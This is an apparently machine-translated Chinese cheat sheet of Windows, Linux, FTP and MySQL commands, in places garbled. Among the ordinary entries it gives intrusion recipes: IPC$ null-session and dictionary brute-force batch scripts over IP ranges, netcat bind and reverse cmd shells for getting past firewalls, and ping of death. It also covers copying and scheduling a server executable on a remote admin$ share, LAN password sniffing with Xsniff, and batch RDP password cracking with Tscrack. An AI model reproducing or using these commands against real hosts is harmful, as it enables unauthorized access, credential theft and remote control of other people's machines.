"Windows Common Commands"

NET use \\ip\ipc$ ""/user: "" to establish an IPC NULL link
NET use \\ip\ipc$ "password"/user: "username" establishes IPC non-null link
NET use h: \\ip\c$ "password"/user: "User name" map the other side c: to local for

H:
NET use H: \\ip\c$ maps after login C: to Local H:
NET use \\ip\ipc$/del remove IPC links
NET use H:/del to delete mappings that map each other to local H:
NET user username password/add set up users
NET user Guest/active:yes activates the guest user
NET user to see which users are
NET user account name to view the properties of the account
net localgroup Administrators user name/add Add "user" to the administrator so that it

With administrator privileges, note: Administrator plus s with plural
net start to see which services are open
Net start service name (e.g.: net start Telnet, net start schedule)
NET stop service name stops a service
NET time \ \ Destination IP to view the offset
NET time \ \ target Ip/set to set the local computer time to synchronize with the "Destination IP" host, plus

On the parameter/yes can cancel the confirmation information
NET view to see which shares are open within the local area network
NET view \\ip see which shares are turned on in the other LAN
NET config display system network settings
NET logoff disconnected sharing
NET Pause Service name pauses a service
NET send IP "text message" to the other party to send messages
NET ver LAN network connection types and information that are in use
NET share viewing locally-enabled shares
NET share ipc$ turn on ipc$ sharing
NET share ipc$/del Delete ipc$ share
NET share C $/del removal of C. shared
NET user Guest 12345 log in with guest user and change password to 12345
NET password Password change system login password
Netstat-a See which ports are open, common Netstat-an
Netstat-n View Port network connectivity, common Netstat-an
Netstat-v viewing work in progress
NETSTAT-P protocol Name Example: Netstat-p tcq/ip View a protocol usage (view TCP/IP

Use of the Protocol)
Netstat-s View all protocol usage in use
Nbtstat-a IP 136 to 139 if one of the ports is open, you can view the last login

User name (user name before 03)-Note: parameter-A to capitalize
Tracert-parameter IP (or computer name) trace route (packet), Parameter: "-W number" is used to set

Timeout interval.
Ping IP (or domain name) sends data with a default size of 32 bytes to the other host, parameter: "-l[space"

Packet size ";"-N Send data Number ";"-T "refers to always ping.
PING-T-l 65550 ip death ping (send files larger than 64K and always ping is the death of

Ping
Ipconfig (winipcfg) for Windows NT and XP (Windows 95 98) To view the local IP address,

Ipconfig available parameters "/all" To display all configuration information
TLIST-T Displays the process as a tree row table (additional tools for the system, which are not installed by default,

Directory in the Support/tools folder)
The KILL-F process name plus the-f parameter forces the end of a process (for the system's additional tools, the default is no security

In the Support/tools folder of the installation directory)
Del-f file name plus-F parameter can delete read-only files,/ar,/ah,/as,/AA, respectively, to delete

Read-only, hidden, system, archive files,/a-r,/a-h,/a-s,/a-a Delete except read-only, hidden

, systems, files other than the archive. For example, "del/ar * *" means deleting all read-only text in the current directory

, "del/a-s * *" means deleting all files except system files in the current directory

DEL/S/Q directory or with: rmdir/s/q directory/S to delete all subdirectories and directories under directory

File. Use the parameter/q at the same time to cancel the system confirmation when the delete operation is deleted directly. (Two orders made

Use the same)
Move drive letter \ path \ file name to move move file path \ Move file name

, use the parameter/y to cancel the prompt to confirm that the mobile directory has the same file, and then directly overwrite
FC One.txt two.txt > 3st.txt compare two files and output the difference to a 3st.txt file

, ">" and "> >" are redirect commands
At ID number to open a scheduled task that has already been registered
At/delete Stop all scheduled tasks, use parameter/yes to stop directly without confirmation
At ID number/delete stop a registered scheduled task
At View all scheduled tasks
At \\IP time program name (or a command)/R run the other program at some point and restart the calculation

Machine
Finger username @host See which users have logged in recently
Telnet IP port far and landing server, default port is 23
Open IP connection to IP (after telnet login command)
Telnet directly on this computer telnet will enter the native Telnet
Copy path \ filename 1 path \ filename 2/y copy file 1 to the specified directory for file 2, with parameters

/y Also cancels the confirmation that you're rewriting an existing directory file.
Copy C:\srv.exe \\ip\admin$ Copying the local c:\srv.exe to the other side of the admin
Cppy 1st.jpg/b+2st.txt/a 3st.jpg to hide the contents of 2st.txt into 1st.jpg generated

3st.jpg new file, Note: 2st.txt file header to empty three rows, parameters:/b refers to the binary file,/a refers to

ASCLL Format Files
Copy \\ip\admin$\svv.exe c \ Or: copy\\ip\admin$\*.* copy each other admini$ share

Srv.exe file (all files) to local C:
xcopy to copy a file or directory tree destination address \ directory name copy file and directory tree, with parameter/y

will not be prompted to overwrite the same file
Tftp-i own IP (using meat machine as a springboard for this with meat machine IP) get Server.exe c:\server.exe

After logging in, download the "IP" Server.exe to the target host C:\server.exe parameter:-I refers to two

In binary mode, such as when transferring EXE files, such as without-I in ASCII mode (transfer text file module

Type) for transmission
Tftp-i the other IP put C:\server.exe login, upload the local c:\server.exe to the host
The FTP IP port is used for uploading files to the server or for file operations, and the default port is 21. Bin refers to using two

Binary transfer (executable file), default to ASCII format (text file)
Route print shows IP routing, which will primarily display network address addres, subnet mask

Netmask, gateway address gateways Addres, interface address interface
ARP view and process ARP cache, ARP is the meaning of name resolution, responsible for the resolution of an IP into a physical

The MAC address of the sex. ARP-A will show all the information
Start Program name or command/max or/min open a new window and maximize (minimize) run a process

Order or command
Mem View CPU Usage
attrib file name (directory name) to view the properties of a document (directory)
attrib filename-a-r-s-h or +a +r +s +h Remove (add) an archive of a file, read-only

, System, hidden property, plus + is added as a property
Dir view file, Parameters:/q Display files and directories the system which user,/T:C display file creation

/t:a shows the last time the file was accessed,/t:w the last modified time
date/t, time/t using this parameter, "date/t", "time/t" will display only the current date and

Time without having to enter a new date and time
SET specifies the environment variable name = The character to assign to the variable set environment variable
Set shows all the current environment variables
Set P (or other character) displays all environment variables currently starting with the character P (or other characters)
Pause pauses the batch process and displays: Press any key to continue ....
If conditional processing is performed in a batch program (see the IF command and variable for more instructions)
The goto label directs the cmd.exe to a labeled row in the batch program (the label must be a separate row and

Preceded by a colon, for example: ": Start" label)
Call path \ batch file name calls another batch program from the batch program (for more instructions see

Call/?)
For each file in a set of files, execute a specific command (see the for command and variable for more instructions)
echo on or off turns echo on or off, and the current ECHO setting is displayed only with echo without parameters
Echo information Displays information on the screen
echo Info >> pass.txt Saving "info" to a pass.txt file
findstr "Hello" aa.txt looking for string Hello in Aa.txt file
Find filename finds a file
Title Title name change cmd window title name
Color value set cmd console foreground and background color; 0 = black, 1 = blue, 2 = green, 3 = light green

, 4 = red, 5= violet, 6 = yellow, 7 = white, 8 = Gray, 9 = blue, a= green, b= light aqua, c= pale,

D= light purple, e= yellow, f= bright white
Prompt name change cmd.exe display command prompt (change C: \, d:\ to entsky\)
Print file name prints text files

VER displays version information under a DOS window
Winver Pop-up window displays version information (memory size, system version, patch version, computer name

）
Format drive letter/fs: Type formatted disk, type: FAT, FAT32, NTFS, Example: Format D:

/fs:ntfs
MD Directory Name creation directory
Replace the file's directory replacement file to replace the source file
ren original filename new file name rename filename
Tree displays a table of contents, with parameter-F to list the file names in the first folder
Type file name Displays the contents of the text file
More file name display output file by screen
Doskey the command to lock = character
Doskey to unlock command = Lock command provided for DOS (Edit command line, recall Win2K command,

and create a macro). such as: Lock dir command: Doskey Dir=entsky (cannot use Doskey dir=dir);

Unlock: Doskey dir=
Taskmgr Bring up Task Manager
chkdsk/f d: Check disk D and Display status report, add parameter/F and Repair errors on disk
tlntadmn telnt service admn, type tlntadmn select 3, and then select 8 to change the Telnet service

Default port 23 is any other port
Exit Cmd.exe program or currently, use the parameter/b to exit the current batch script instead of Cmd.exe
Path path \ The file name of the executable file is set to an executable file.
CMD launches a Win2K command Interpretation window. Parameters:/eff,/en off, open command extension;

See cmd for detailed instructions.
REGEDIT/S registry File name Import registry, parameters/s refers to quiet mode import, without any hint;
regedit/e registry File name Export Registry
cacls filename parameter to display or modify file access control lists (ACLs)-When in NTFS format

。 Parameter:/d Username: Set deny user access;/P user name ERM replaces access for specified user

/g user name ERM gives the specified user access rights; Perm can be: N None, R read,

W Write, C Change (write), F Full Control; Example: cacls d:\test.txt/d Pub setting

D:\test.txt denies pub user access.
cacls file name to view a list of Access user rights for files
REM text content add annotations to a batch file
Netsh view or change the configuration of the local network

IIS Service commands:
Iisreset/reboot Restart the Win2K computer (but prompted the system will restart the message appears)
Iisreset/start or stop to start (stop) all Internet services
Iisreset/restart stop and then restart all Internet services
Iisreset/status Show all Internet service status
Iisreset/enable or disable enable (disable) Restart of Internet services on the local system

Move
Iisreset/rebootonerror If an error occurs when you start, stop, or restart the Internet service

The error will restart the boot
Iisreset/noforce If you cannot stop Internet services, you will not be forced to terminate Internet services
Iisreset/timeout Val still does not stop Internet services when it arrives over time (seconds), if specified

/rebootonerror parameter, the computer will reboot. Default value is 20 seconds to restart, stop 60 seconds

, reboot for 0 seconds.
FTP command: (Details are explained later)
The command line format for FTP is:
Ftp-v-d-i-n-g[Host name]-V displays all the response information for the remote server.
-D uses debug mode.
-N Restricts automatic logon of FTP, that is, the. netrc file is not used.
-G cancels the global file name.
Help [command] or? [command] View command description
Bye or quit terminates the host FTP process and exits the FTP management mode.
PWD lists the current remote host directory
Put or send local file name [upload file name on host] to transfer local files to remote

In the host
Get or recv [remote host file name] [filename downloaded to local] is transferred from the remote host to

On the local host
Mget [Remote-files] receives a batch of files from the remote host to the local host
Mput Local-files transfers A batch of files from the local host to the remote host
dir or LS [remote-directory] [local-file] lists the files in the current remote host directory.

If there is a local file, write the result to a local file
ASCII settings transfer files in ASCII mode (default value)
Bin or image settings to transfer files in binary mode
Bell every time a file transfer, Alarm prompts
Cdup return to the top level directory
Close interrupts the FTP session with the remote server (corresponding to open)
Open Host[port] Establish a specified FTP server connection to specify the connection port
Delete deletes files from the remote host
Mdelete [remote-files] Deleting a batch of files
mkdir directory-name Creating directories in the remote host
Rename [from] [to] changes the file name in the remote host
RmDir directory-name Delete Directories in the remote host
Status displays the state of the current FTP
System displays the remote host systems type
User user-name [Password] [account] re-login to the remote host with another user name
Open host [port] re-establishes a new connection
Prompt interactive Prompt mode
MACDEF Defining macro Commands
The LCD changes the working directory of the current local host and, if default, goes to the home directory of the current user
chmod changing the file permissions of the remote host
Case when on, use the mget command to copy the file name to the local machine, all converted to lowercase letters
CD Remote-dir into the remote host directory
Cdup Enter the parent directory of the remote host directory
! Perform an interactive shell,exit in the local machine back to the FTP environment, such as!ls*.zip

MYSQL command:
Mysql-h host Address-u user name-p password connection mysql; If you just installed MySQL, super users

Root does not have a password.
(Example: mysql-h110.110.110.110-uroot-p123456
Note: You and root can use no spaces, others are the same)
Exit MySQL
Mysqladmin-u username-p Old password password new password change password
Grant SELECT on database. * To User name @ login host identified by \ "Password \"; Increase

Add a new user. (Note: Unlike the above, the following is because it is a command in the MySQL environment, so the later

With a semicolon as the command Terminator)
show databases; Displays the list of databases. Just started with two databases: MySQL and test.

MySQL Library is very important it has the MySQL system information, we change the password and the new user, is actually

Use this library to operate.
Use MySQL;
Show tables; Displaying data tables in a library
describe table name; Show the structure of a data table
Create database name; Build Library
Use library name;
CREATE TABLE table name (field settings list);
drop database name;
drop table name, delete library and delete table
Delete from table name; Empty records in a table
SELECT * from table name; Show records in a table
mysqldump--opt school>school.bbb Backup database: (Command in DOS \\mysql\\bin

directory); Note: Backing up the database school to the school.bbb file, SCHOOL.BBB is a

Text file, file name any, open to see what you will find.
New commands under Win2003 System (Practical section):
Shutdown/Parameters Close or restart the local or remote host.
Parameter description:/S Shut down the host,/R restart the host,/T digital Set the time delay, range 0~180

Seconds,/A cancels the boot,/M//IP the specified remote host.
Example: SHUTDOWN/R/T 0 restart the local host immediately (no delay)
Taskill/Parameter The process name or PID of the process terminates one or more tasks and processes.
Parameter description:/pid to terminate the PID of the process, the tasklist command can be used to obtain the pid,/im of each process.

Process name of the terminated process,/F force terminate process,/T terminates the specified process and the Wahabbi he initiated

Ride.
TASKLIST Displays the processes, services, and services processes that are currently running on local and remote hosts.

Character (PID).
Parameter description:/M lists the DLL files that are loaded by the current process, and/SVC displays the services corresponding to each process.

Only the current process is listed when there is no parameter.

Linux system basic commands: to distinguish case
Uname display version information (same as Win2K ver)
DIR Displays the current directory file, Ls-al display includes hidden files (dir with Win2K)
PWD Query the directory location where you are currently located
CD CD. Go back to the previous level and note the CD with the. There are spaces between them. CD/Return to the root directory.
Cat file name view file contents
Cat >abc.txt The contents of the Abc.txt file.
More file names display a text file in a page-by-page fashion.
CP Copy File
MV Moving files
RM file name Delete file, rm-a directory name delete directory and subdirectories
mkdir Directory name creation directory
RmDir Delete subdirectories, there are no documents in the directory.
chmod setting access rights to files or directories
Grep finds a string in the archive
Diff file Comparison
Find Archive Search
Date, time of day
Who queries the person who is currently using the same machine as you and the login time location
W Query the details of the current person on the machine
WhoAmI to see your account name
Groups to see someone's group
passwd Change Password
History View the commands you've been under
PS Display process Status
Kill stops a process
GCC hackers usually use it to compile files written in C language.
The SU permission is converted to the specified consumer
Telnet IP Telnet connects to the other host (same as Win2K), indicating that the connection was successful when bash$ was present.
FTP FTP connection on a server (same as Win2K)

Attached: Batch commands and variables

1:for command and variable basic format:
For/Parameter%variable in (set) do command [Command_parameters]%variable:

Specifies a single-letter replaceable parameter, such as:%i, while specifying a variable is used by:%%i, while calling

Variables are used:%i%, variables are case-sensitive (%i not equal to%i).
A total of 10 variables can be processed per batch from%0-%9, where%0 is used by default for batch file names,%1

The default is the first value entered when using this batch, the same as:%2-%9 refers to the input 第2-9个 value;

: NET use \\ip\ipc$ pass/user:user IP is%1,pass%2 and user is%3

(SET): Specifies a file or set of files that can be used with wildcards such as: (D:\user.txt) and (1 1 254) (1

-1 254), {"(1 1 254)" The first "1" means the starting value, the second "1" refers to the increment, the third "254"

Refers to the end value, i.e. from 1 to 254; "(1-1 254)" Description: From 254 to 1}

Command: Specifies the commands to be executed against the first file, such as the net USE command, if you want to execute multiple commands

, command this:& to separate
Command_parameters: Specifying parameters or command-line switches for specific commands

In (set): Refers to the value in the (set); Do command: means the command

Parameter:/L refers to the increment form {(set) as an increment when};/f refers to the constant value from the file until the

until {(set) is a file, such as (D:\pass.txt)}.
Examples of usage:
@echo off
echo usage format: Test.bat *.*.* > Test.txt

FOR/L%%g in (1 1 254) does echo%1.%%g >>test.txt & net use \\%1.%%g

/user:administrator | Find "command completed successfully" >>test.txt
Save As Test.bat Description: For the specified class C segment of the 254 IP to try to establish administrator

The password is empty for the ipc$ connection, and if successful, the IP is present in the Test.txt.

/L refers to the increment form (that is, from 1-254 or 254-1); The IP front three bits entered: *.*.* is the default for batch processing

The%1;%%g is a variable (the last of the IP);& used to separate the two commands for Echo and net use;

| When ipc$ is established, find in the results to see if there is a "command completed successfully" message;%1.%%g

The full IP address; (1 1 254) refers to the starting value, the growth amount, the value of the knot.
@echo off
echo Usage format: Ok.bat IP
for/f%%i in (D:\user.dic) do smb.exe%1%%i D:\pass.dic 200
Save As: Ok.exe Description: After entering an IP, use the dictionary file D:\pass.dic to solve the violence d:\user.dic

The user password in the file until the value is exhausted. %%i is the user name;%1 is the IP address entered (the default

）。

2:if command and variable basic format:
If [NOT] errorlevel numeric command statement if the program runs and returns a value equal to or greater than the

Set the exit code for the number, specifying that the condition is true.
Example: the IF errorlevel 0 command refers to a command that returns a value of 0 o'clock after a program executes, after the value line;

If the ERRORLEVEL 1 command means that the last value returned by the program execution is not equal to 1, execute the following command

。
0 means found and executed successfully (true); 1 means no discovery, no execution (false).
If [not] string 1== string 2 command statement if the specified text string matches (i.e.: string

1 equals the string 2), the following command is executed.
Example: "If"%2% "= =" 4 "goto start" means: If the second variable entered is 4 o'clock, perform the following

Command (note: The% variable name% and "") when calling a variable
If [not] exist file name Command statement executes the following command if the specified file name exists.
Example: "If not nc.exe goto end" means: If no Nc.exe file is found, jump to ": End" label

The signing office.
If [NOT] errorlevel numeric command statement Else command statement or IF [not] string 1== Word

Character String 2 command statement Else command statement or IF [not] exist file name Command statement else command

Statement Plus: The ELSE command statement refers to: when the condition of the current polygon is not true, it refers to the life behind the line else.

Make. Note: Else must be valid on the same line as if. The DEL command is required when there is a del command.

The content is enclosed in < > because the DEL command executes on a separate line, and with < > it is a separate

One line, for example: "If exist test.txt. else Echo

Test.txt.missing ", note the". "In the command

(ii) System external commands (all need to download the relevant tools):

1. Swiss Army Knife: Nc.exe

Parameter description:
-H View Help information
-D Background mode
-e Prog program redirection, one but connection execution [dangerous]
-I secs delay interval
-L listening mode for inbound connections
-l monitor mode, continue listening after the connection is closed until Ctr+c
-N IP address, cannot use domain name
-O film record 16-binary transmission
-p[space] Port local number
-R random Local and remote ports
-T using telnet interactive mode
-U UDP mode
-v verbose output, with-VV will be more detailed
-W Digital Timeout delay interval
-Z will input, output off (when used to sweep anchor)
Basic usage:
NC-NVV 192.168.0.1 80 Connection to the 192.168.0.1 host's 80 port
Nc-l-P 80 turn on the native TCP 80 port and listen
Nc-nvv-w2-z 192.168.0.1 80-1024 sweep anchor 192.168.0.1 80-1024 ports
Nc-l-P 5354-t-e c:winntsystem32cmd.exe bound remote host Cmdshell

Remote TCP 5354 Port
NC-T-e c:winntsystem32cmd.exe 192.168.0.2 5354 bang set remote host

Cmdshell and reverse connect the 192.168.0.2 5354 port
Advanced usage:
Nc-l-P 80 as a honeypot 1: Open and keep listening to 80 ports until Ctr+c
Nc-l-p > C:\log.txt as Honeypot 2: Open and keep listening to 80 ports until

Ctr+c and output the results to C:\log.txt
Nc-l-P < c:\honeyport.txt as honeypot 3-1: Open and keep listening to 80 ports,

Until Ctr+c, and put the contents of C:\honeyport.txt into the pipeline, can also play the role of transmitting files
Type.exe C:\honeyport | Nc-l-P 80 as a honeypot 3-2: Open and keep listening to the 80 end

Ctr+c, and the contents of the C:\honeyport.txt into the pipeline, can also play the role of transmitting files
On-Machine use: nc-l-P native Port
On the other side of the host with: nc-e Cmd.exe native ip-p native Port *win2k
Nc-e/bin/sh native Ip-p native port *linux,unix Reverse connection break the fire of the other host

Wall
On-Machine use: nc-d-l-p Native Port < file path and name to be transferred
On the other side of the host with: NC-VV native IP Native port > file path and name transfer file

To the other host
Notes
| Pipeline command
< or > redirect command. "<", for example: tlntadmn < test.txt refers to the contents of Test.txt

Assign a value to the tlntadmn command
@ means that the command after @ is executed, but not displayed (background execution); Example: @dir C:\Winnt

>> d:\log.txt means: dir is executed in the background and the result exists in D:\log.txt
The difference between > and >> ">" means: Overwrite; ">>" means: Save to (add to).
such as: @dir C:\Winnt >> d:\log.txt and @dir c:\winnt > d:\log.txt two commands respectively

Perform two comparison look: The >> is to save two times the results, and with:> only once the result

, because the second result covers the first time.

2, Sweep anchor tool: Xscan.exe

Basic format
Xscan-host < start ip>[-< stop Ip>] < detect items > [Other options] Sweep anchor "Start IP to terminate

IP "segment for all host information
Xscan-file < host list file name > < detection Project > [Other options] sweep anchor host IP list files

All host information in the name "
Test items
-active detects if the host is alive
-os detecting Remote Operating system types (via NetBIOS and SNMP protocol)
-port Detecting port status for common services
-FTP Detecting FTP Weak password
-pub Detect FTP Service anonymous user write permission
-POP3 Detecting pop3-server Weak password
-SMTP Detecting Smtp-server Vulnerabilities
-sql Detecting sql-server Weak password
-SMB Detecting nt-server Weak password
-iis Detecting IIS Encoding/decoding vulnerabilities
-CGI Detecting CGI Vulnerabilities
-NASL Load Nessus Attack script
-all detect all of the above items
Other options
-I adapter number set the network adapter, < adapter number > can be obtained by the "-L" parameter
-L Show All network adapters
-V Show detailed scan progress
-P skips hosts that are not responding
-O Skip hosts that do not detect open ports
-T concurrent threads, number of concurrent hosts specifies the maximum number of concurrent threads and number of concurrent hosts, default

Number of 100,10
-log file name Specifies the scan report file name (suffix: TXT or HTML-formatted file)
Usage examples
Xscan-host 192.168.1.1-192.168.255.255-all-active-p Detection

192.168.1.1-192.168.255.255 all the vulnerabilities of hosts within a network segment, skipping unresponsive hosts
Xscan-host 192.168.1.1-192.168.255.255-port-smb-t 150-o Detection

Standard port status of host in 192.168.1.1-192.168.255.255 network segment, NT weak password user, max

The number of concurrent threads is 150, skipping hosts that do not detect open ports
Xscan-file hostlist.txt-port-cgi-t 200,5-v-o detection "hostlist.txt"

The standard port State of all hosts listed in the file, the CGI vulnerability, the maximum number of concurrent threads is 200, the same

Detects up to 5 hosts at a time, displays detailed detection progress, skips hosts that do not detect open ports

3. Command line sniffer: Xsniff.exe
Can capture ftp/smtp/pop3/http protocol password in LAN
Parameter description
-TCP Output TCP Datagram
-UDP output UDP Datagram
-ICMP output ICMP datagram
-pass Filter Password information
-hide Background Run
-host Resolving host Names
-ADDR IP address Filter IP address
-port Port Filter Port
-log file name output saved to file
-ASC output in ASCII format
-hex output in 16 binary form
Usage examples
Xsniff.exe-pass-hide-log pass.log background run sniff password and save password information in

In the Pass.log file
Xsniff.exe-tcp-udp-asc-addr 192.168.1.1 Sniff 192.168.1.1 and filter TCP and

UDP information and output in ASCII format

4, Terminal Services password cracking: Tscrack.exe

Parameter description
-H Display Use Help
-V Display version information
-S on-screen decryption capability
-B sound when password is wrong
-T with multiple connections (multi-threaded)
-N Prevent System Log entries on targeted server
-u uninstall remove Tscrack component
-F Use the password after-F
-F Interval Time (frequency)
-l Use user name after-l
-W Use the password dictionary after-W
-P Use the password after-p
-D sign-in main page
Usage examples
Tscrack 192.168.0.1-l administrator-w pass.dic remote with password dictionary file burst

Administrator login password of the host
Tscrack 192.168.0.1-l administrator-p 123456 remote login with password 123456

192.168.0.1 's administrator users
@if not exist Ipcscan.txt Goto Noscan
@for/F "Tokens=1 delims="%%i in (3389.txt) does call Hack.bat%%i
Nscan
@echo 3389.txt no find or scan faild
(① saved as 3389.bat) (assuming that an existing superscan or other sweep anchor is swept to a batch of 3389 main

Machine IP list file 3389.txt)
3389.bat means: Take an IP from the 3389.txt file, then run Hack.bat
@if not exist Tscrack.exe Goto Noscan
@tscrack%1-l administrator-w pass.dic >>rouji.txt
: Noscan
@echo Tscrack.exe no find or scan faild
(② saved as Hack.bat) (run 3389.bat is OK, and 3389.bat, Hack.bat, 3389.txt,

Pass.dic and Tscrack.exe in the same directory; You can wait for the result.)
Hack.bat means: Run Tscrack.exe with a dictionary burst all the hosts in 3389.txt

Administrator password and save the cracked result in the Rouji.txt file.

5. Other:

Shutdown.exe
Shutdown \\IP address t:20 20 seconds after NT auto-shutdown (Windows 2003 system comes with tools

, you need to download this tool to use it under Windows2000. In the previous Windows 2003 DOS command

Detailed description is available. ）
The Fpipe.exe (TCP port Redirection tool) is described in detail in the second article (Port redirection bypasses fire

Wall
Fpipe-l 80-s 1029-r [Url]www.sina.com.cn[/url] When someone sweeps your 80 port, he sweeps

The result will be fully [Url]www.sina.com.cn[/url] host information
Fpipe-l 23-s 88-r 23 Destination IP sends the native to the destination IP 23-port Telnet request via

After the Kouzhong is directed, it is sent via Port 88 to port 23 of the destination IP. (When you establish telnet with the destination IP, this

88 ports connected to the machine) and then: direct telnet 127.0.0.1 (native IP) connects to

23 Port of the destination IP.
OpenTelnet.exe (remotely turn on the Telnet tool)
Opentelnet.exe \\IP account password NTLM authentication mode telnet port (no upload required

Ntlm.exe destroys Microsoft's authentication method) is available when the other Telnet service is opened directly remotely

Telnet \\ip Connect to the other side.
NTLM authentication method: 0: Do not use NTLM authentication; 1: First try NTLM authentication, if it fails

, and then use the user name and password; 2: Use only NTLM authentication.

ResumeTelnet.exe (another tool included with Opentelnet)
Resumetelnet.exe \\IP account password after connecting with Telnet, use this command to

The other side's Telnet settings are restored, and the Telnet service is turned off.

6, FTP command detailed:

FTP commands are one of the most frequently used commands for Internet users, and they are familiar with and have the flexibility to apply FTP internal commands

, can greatly facilitate users, and receive a multiplier effect. If you want to learn to use background FTP under

You must learn the FTP instructions.

The command line format for FTP is:
Ftp-v-d-i-n-g [host name], where

-V Displays all the response information for the remote server;

-N Limit FTP automatic login, that is, do not use;. n etrc file;

-d use debug mode;

-G cancels the global file name

"Windows Common Commands"